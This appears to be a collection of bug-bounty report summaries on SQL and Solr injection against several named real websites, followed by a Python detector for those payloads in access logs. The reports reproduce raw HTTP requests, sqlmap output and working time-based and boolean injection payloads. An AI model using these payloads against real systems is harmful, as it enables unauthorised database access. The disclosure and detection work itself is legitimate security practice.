SQL Injection on the Administrator Panel SQLi
There is a SQL Injection vulnerability at the endpoint https://mtngbissau.com/webadmin/index.php:
POST /webadmin/index.php HTTP/1.1
Host: mtngbissau.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mtngbissau.com/webadmin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: close
Cookie: PHPSESSID=74db1535be320f591b6106253ad77191; SERVERID68971=262072|Xq8Kv|Xq8Ip
Upgrade-Insecure-Requests: 1
login=user'&pass=uesse

The attacker used sqlmap to confirm it:
[*] starting @ 21:06:44 /2020-05-03/
[18:05:44] [INFO] parsing HTTP request from 'post'
[18:06:10] [INFO] resuming back-end DBMS 'mysql'
[18:06:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: login (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login=admin' AND (SELECT 5206 FROM (SELECT(SLEEP(5)))THtF) AND 'MHhg'='MHhg&pass=admin
---
[18:06:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:06:45] [INFO] fetched data logged to text files under '/home/kira/.sqlmap/output/mtngbissau.com'

SQL Injection in https://demor.adr.acronis.com/ via the username Parameter SQLi
SQL injection in the username parameter:
POST /ng/api/auth/login HTTP/2
Host: demor.adr.acronis.com
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://demor.adr.acronis.com/
Cookie: PHPSESSID=bsrq24l7g5fmth5b683v2b3gu4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
{"username":"0'XOR(if(now()=sysdate(),sleep(35),0))XOR'Z","id":"27","password":"cc4226104294e44c5cec9f31cb6de7fa4597e4321b277f4e4b78c3a0ff980956"}

Boolean Based Blind Sql Injection Via User Agent in ███.mil SQLi
The attacker can perform a Boolean-based SQL Injection through the User-Agent header. Payload:
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10' AND 8074=8074-- KwOG

Abusing LocalParams (city) to Inject SOLR Query solr-injection
The attacker can perform a Solr injection (Solr is an Apache search engine) through the city parameter at the endpoint /webapi/searchapi.php. The attacker detected it by appending a backslash to the end of the parameter value and observing that the server returned a 500 response, whereas with two backslashes the response was 200.
Tip
Although it could not be exploited, partly because it is a blind injection, the attacker was still paid a bounty.
Info
There is a report, Eternal | Report #953203 - [api.zomato.com] Abusing LocalParams (city_id) to Inject SOLR query | HackerOne, with a similar vulnerability:
:v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en
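A defender-side detection example, added here and not part of any of the reports above: it scans constructed JSON-lines access logs for the three injection classes on this page (time-based SQLi, boolean-based SQLi via User-Agent, Solr LocalParams) and for the single-trailing-backslash probe that distinguished the Solr endpoint. The log format, the field names and the sample lines are assumptions; the sample values are modelled on the payloads quoted above.

```python
import json
import re
from urllib.parse import unquote_plus

# Signatures for the report classes above: time-based SQLi (SLEEP, now()=sysdate()),
# boolean-based SQLi (' AND 8074=8074-- ), Solr LocalParams ({!dismax ...}) and the
# lone trailing backslash used to probe the Solr endpoint (odd count of backslashes).
SIGNATURES = [
    ("sqli-time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("sqli-time-based", re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I)),
    ("sqli-boolean", re.compile(r"'\s*(?:and|or)\s+(\d+)\s*=\s*\1\s*(?:--|#)", re.I)),
    ("solr-localparams", re.compile(r"\{!\s*[a-z]+", re.I)),
    ("solr-escape-probe", re.compile(r"(?<!\\)(?:\\\\)*\\$")),
]

def decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so percent-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the set of signature labels matching one decoded request field."""
    text = decode(value)
    return {label for label, rx in SIGNATURES if rx.search(text)}

def scan(log_lines):
    """Return (line_no, field, label) for each suspicious query/body/User-Agent field."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        rec = json.loads(line)
        for field in ("query", "body", "user_agent"):
            for label in sorted(classify(rec.get(field, ""))):
                hits.append((n, field, label))
    return hits

# Constructed sample log (not real traffic), modelled on the payloads in the reports above.
SAMPLE_LOG = [json.dumps(r) for r in (
    {"path": "/webadmin/index.php",
     "body": "login=admin%27+AND+%28SELECT+5206+FROM+%28SELECT%28SLEEP%285%29%29%29THtF%29+AND+%27MHhg%27%3D%27MHhg&pass=admin"},
    {"path": "/ng/api/auth/login",
     "body": '{"username":"0\'XOR(if(now()=sysdate(),sleep(35),0))XOR\'Z","password":"x"}'},
    {"path": "/", "user_agent": "Mozilla/5.0 (Macintosh) Safari/523.10' AND 8074=8074-- KwOG"},
    {"path": "/webapi/searchapi.php", "query": "city=%7B!dismax+df%3Dcity%7DBissau"},
    {"path": "/webapi/searchapi.php", "query": "city=Bissau%5C"},     # single trailing backslash
    {"path": "/webapi/searchapi.php", "query": "city=Bissau%5C%5C"},  # escaped backslash, benign
)]
```

Running `scan(SAMPLE_LOG)` flags lines 1 to 5 once each and leaves the properly escaped line 6 alone; in production the same scan would run over the real access-log fields instead of the constructed list.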